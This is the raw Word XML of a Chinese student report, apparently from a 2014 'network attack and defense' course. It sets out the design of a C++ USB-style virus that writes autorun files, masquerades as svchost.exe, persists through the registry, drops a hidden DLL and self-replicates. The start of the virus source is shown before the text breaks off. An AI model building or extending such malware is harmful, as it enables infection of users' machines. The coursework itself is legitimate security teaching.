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8C" w:rsidRPr="00375F74" w:rsidRDefault="00E8218C" w:rsidP="007F3E90">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E8218C" w:rsidRPr="00375F74" w:rsidRDefault="00E8218C" w:rsidP="00CA49AE">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00375F74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1026795" cy="845185"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="2" name="图片 2" descr="head_r1_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_r1_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F74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2769235" cy="845185"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="图片 1" descr="head_r1_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_r1_c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8C" w:rsidRPr="00375F74" w:rsidRDefault="00E8218C" w:rsidP="00E8218C">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E8218C" w:rsidRPr="00375F74" w:rsidRDefault="00E8218C" w:rsidP="00E8218C">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E8218C" w:rsidRPr="00375F74" w:rsidRDefault="00E8218C" w:rsidP="00E8218C">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E8218C" w:rsidRPr="00375F74" w:rsidRDefault="00E8218C" w:rsidP="00E8218C">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E8218C" w:rsidRPr="001D69DA" w:rsidRDefault="00E8218C" w:rsidP="001D69DA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D69DA">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>《</w:t>
      </w:r>
      <w:r w:rsidRPr="001D69DA">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>网络攻防课程设计</w:t>
      </w:r>
      <w:r w:rsidRPr="001D69DA">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>》</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E8218C" w:rsidRPr="00064B7A" w:rsidRDefault="00E8218C" w:rsidP="007A5E5A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00064B7A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>设计报告</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E8218C" w:rsidRPr="00375F74" w:rsidRDefault="00E8218C" w:rsidP="00E8218C">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr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6237"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E8218C" w:rsidRPr="006879C9" w:rsidTr="008F7AFC">
        <w:trPr>
          <w:trHeight w:val="613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E8218C" w:rsidRPr="006879C9" w:rsidRDefault="00E8218C" w:rsidP="00BD4547">
            <w:pPr>
              <w:ind w:leftChars="200" w:left="1200" w:hangingChars="300" w:hanging="720"/>
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006879C9">
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体"/>
              </w:rPr>
              <w:t>学</w:t>
            </w:r>
            <w:r w:rsidRPr="006879C9">
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidR="006879C9">
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="006879C9">
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体"/>
              </w:rPr>
              <w:t>院：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218C" w:rsidRPr="006879C9" w:rsidRDefault="00E8218C" w:rsidP="006932C2">
            <w:pPr>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006879C9">
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体"/>
              </w:rPr>
              <w:t>信息工程学院</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E8218C" w:rsidRPr="006879C9" w:rsidTr="008F7AFC">
        <w:trPr>
          <w:trHeight w:val="613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E8218C" w:rsidRPr="006879C9" w:rsidRDefault="00E8218C" w:rsidP="006932C2">
            <w:pPr>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006879C9">
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>专业班级</w:t>
            </w:r>
            <w:r w:rsidRPr="006879C9">
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体"/>
              </w:rPr>
              <w:t>：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218C" w:rsidRPr="006879C9" w:rsidRDefault="00E8218C" w:rsidP="006932C2">
            <w:pPr>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006879C9">
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>信息安全</w:t>
            </w:r>
            <w:r w:rsidRPr="006879C9">
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidRPr="006879C9">
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="006879C9">
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体"/>
              </w:rPr>
              <w:t>班</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E8218C" w:rsidRPr="006879C9" w:rsidTr="008F7AFC">
        <w:trPr>
          <w:trHeight w:val="598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E8218C" w:rsidRPr="006879C9" w:rsidRDefault="00E8218C" w:rsidP="006932C2">
            <w:pPr>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006879C9">
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体"/>
              </w:rPr>
              <w:t>学　　号：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18C" w:rsidRPr="006879C9" w:rsidRDefault="00E8218C" w:rsidP="006932C2">
            <w:pPr>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006879C9">
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E8218C" w:rsidRPr="006879C9" w:rsidTr="008F7AFC">
        <w:trPr>
          <w:trHeight w:val="613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E8218C" w:rsidRPr="006879C9" w:rsidRDefault="00E8218C" w:rsidP="006932C2">
            <w:pPr>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006879C9">
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体"/>
              </w:rPr>
              <w:t>姓　　名：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18C" w:rsidRPr="006879C9" w:rsidRDefault="00E8218C" w:rsidP="006932C2">
            <w:pPr>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006879C9">
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>江林伟</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E8218C" w:rsidRPr="006879C9" w:rsidTr="008F7AFC">
        <w:trPr>
          <w:trHeight w:val="598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E8218C" w:rsidRPr="006879C9" w:rsidRDefault="00E8218C" w:rsidP="006932C2">
            <w:pPr>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006879C9">
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体"/>
              </w:rPr>
              <w:t>指导老师：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18C" w:rsidRPr="006879C9" w:rsidRDefault="00E8218C" w:rsidP="006932C2">
            <w:pPr>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006879C9">
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>李 伟</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E8218C" w:rsidRPr="006879C9" w:rsidTr="008F7AFC">
        <w:trPr>
          <w:trHeight w:val="598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E8218C" w:rsidRPr="006879C9" w:rsidRDefault="00E8218C" w:rsidP="006932C2">
            <w:pPr>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006879C9">
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体"/>
              </w:rPr>
              <w:t>完成时间：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18C" w:rsidRPr="006879C9" w:rsidRDefault="00E8218C" w:rsidP="006932C2">
            <w:pPr>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006879C9">
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体"/>
              </w:rPr>
              <w:t>201</w:t>
            </w:r>
            <w:r w:rsidRPr="006879C9">
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>4年7月</w:t>
            </w:r>
            <w:r w:rsidRPr="006879C9">
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidRPr="006879C9">
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>日</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E8218C" w:rsidRPr="006879C9" w:rsidTr="008F7AFC">
        <w:trPr>
          <w:trHeight w:val="598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E8218C" w:rsidRPr="006879C9" w:rsidRDefault="00E8218C" w:rsidP="006932C2">
            <w:pPr>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006879C9">
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体"/>
              </w:rPr>
              <w:t>成    绩：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18C" w:rsidRPr="006879C9" w:rsidRDefault="00E8218C" w:rsidP="006932C2">
            <w:pPr>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E8218C" w:rsidRPr="005F0CA1" w:rsidRDefault="00E8218C" w:rsidP="00E8218C">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E8218C" w:rsidRPr="005F0CA1" w:rsidRDefault="00E8218C" w:rsidP="00E8218C">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E8218C" w:rsidRPr="00375F74" w:rsidRDefault="00E8218C" w:rsidP="00E8218C">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0092589C" w:rsidRDefault="006F2FAA" w:rsidP="004C3266">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>一、</w:t>
      </w:r>
      <w:r w:rsidR="0092589C">
        <w:t>设计目的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001774F7" w:rsidRDefault="009B47FA" w:rsidP="009B47FA">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>利用C++编写基本的病毒</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B47FA" w:rsidRDefault="009B47FA" w:rsidP="009B47FA">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>了解自动生成病毒体的病毒特性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B47FA" w:rsidRDefault="009B47FA" w:rsidP="009B47FA">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>学会病毒开机自启动的手段和注册表设置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B47FA" w:rsidRDefault="009B47FA" w:rsidP="009B47FA">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>了解并实现注入DLL的方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0092589C" w:rsidRDefault="006F2FAA" w:rsidP="004C3266">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二、</w:t>
      </w:r>
      <w:r w:rsidR="002B555A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设计要求与指标</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC5544" w:rsidRDefault="00CC5544" w:rsidP="000F1BF7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在C、D、E盘和</w:t>
      </w:r>
      <w:r>
        <w:t>C:\Windows\System</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>C:\Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中生成病毒体文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC5544" w:rsidRDefault="00CC5544" w:rsidP="000F1BF7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、D、E盘中生成自动运行文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC5544" w:rsidRDefault="00CC5544" w:rsidP="000F1BF7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>注册</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C:\Windows</w:t>
      </w:r>
      <w:r>
        <w:t>\system\svchost.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，使其开机自动运行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC5544" w:rsidRDefault="00CC5544" w:rsidP="000F1BF7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C:\</w:t>
      </w:r>
      <w:r>
        <w:t>Windows\System</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下生成隐蔽DLL文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B555A" w:rsidRDefault="00CC5544" w:rsidP="000F1BF7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>病毒在执行后具有相联复制能力</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B555A" w:rsidRDefault="006F2FAA" w:rsidP="004C3266">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三、</w:t>
      </w:r>
      <w:r w:rsidR="002B555A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设计内容与具体实现过程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B555A" w:rsidRDefault="002B555A" w:rsidP="004C3266">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r>
        <w:t>自我复制与运行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D75BE" w:rsidRDefault="006D75BE" w:rsidP="006D75BE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类似普通U盘病毒，具有自我复制、运行能力。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRDefault="005E4981" w:rsidP="005E4981">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="YaHei Consolas Hybrid" w:eastAsia="YaHei Consolas Hybrid" w:hAnsi="YaHei Consolas Hybrid"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:sectPr w:rsidR="005E4981" w:rsidSect="007F3E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991" w:bottom="851" w:left="993" w:header="851" w:footer="992" w:gutter="0"/>
          <w:cols w:space="425"/>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:lastRenderedPageBreak/>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:t xml:space="preserve"> * svchost.cpp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:t xml:space="preserve"> *  Created on: 2014</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>年</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>月</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>日</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:t xml:space="preserve"> *      Author: </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ismdeep</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:t>/* SVCHOST.CPP   */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:t>/* SVCHOST.EXE */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>#define</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t xml:space="preserve"> SVCHOST_NUM 6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>#include</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>&lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>#include</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>&lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>#include</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>&lt;windows.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t xml:space="preserve"> *autorun =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  <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>"[</w:t>
      </w:r>
